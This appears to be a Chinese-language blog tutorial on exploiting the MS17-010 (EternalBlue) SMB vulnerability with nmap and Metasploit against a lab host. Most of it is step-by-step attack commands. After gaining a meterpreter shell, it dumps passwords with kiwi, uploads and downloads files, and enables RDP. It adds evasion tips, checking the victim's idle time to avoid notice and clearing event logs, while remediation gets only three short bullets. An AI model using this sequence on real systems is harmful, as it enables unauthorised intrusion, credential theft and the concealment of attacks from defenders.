ms17-010

发布时间 2023-04-17 20:36:35作者: 西与洲

用nmap的漏洞扫描模式

nmap --script=vuln 192.168.178.128

可以发现,靶机上扫到了4个漏洞,其中包括了MS17-010。

 

打开metasploit(msf很有意思的是,每次打开都会显示不同的画面。)

msfconsole

 搜索ms17-010相关模块,可以看到一共找到了6个不同的模块。(选项:0-5)

search ms17-010

 加载扫描模块。(选项1)

use auxiliary/scanner/smb/smb_ms17_010

查看配置选项

show options

 RHOSTS显示远程主机未配置,配置目标主机。

开始扫描漏洞,再次证实靶机存在MS17-010漏洞。

 使用永恒之蓝攻击模块:exploit/windows/smb/ms17_010_eternalblue
并设置攻击载荷:

 查看选项并设置rhosts:

 输入exploit(run)开始攻击。

 运行成功会出现meterpreter >
Meterpreter 是 Metasploit 的一个扩展模块,可以调用 Metasploit 的一些功能,
对目标系统进行更深入的渗透,如获取屏幕、上传/下载文件、创建持久后门等。

捕获屏幕     meterpreter > screenshot

 

 

上传/下载文件

meterpreter > upload hello.txt c://

 meterpreter > download d://1.txt

 

 获取用户密码

meterpreter > load kiwi

Loading extension kiwi...Success.

Kiwi在32位系统中能够正常使用,到了64位系统中需要用到进程迁移http://hackdig.com/09/hack-144260.htm

完成进程迁移后:

meterpreter > creds_all

 启用远程桌面,配合上一步获取到的密码。

meterpreter > run post/windows/manage/enable_rdp

使用时一般配合查看远程用户的空闲时长,空闲时间长再进行远程登陆,减小被发现的风险。登录rdp会把对方顶掉。

 

meterpreter > idletime

 清除日志

meterpreter > clearev

修复方案

  • 关闭445端口。
  • 打开防火墙,安装安全软件。
  • 安装对应补丁。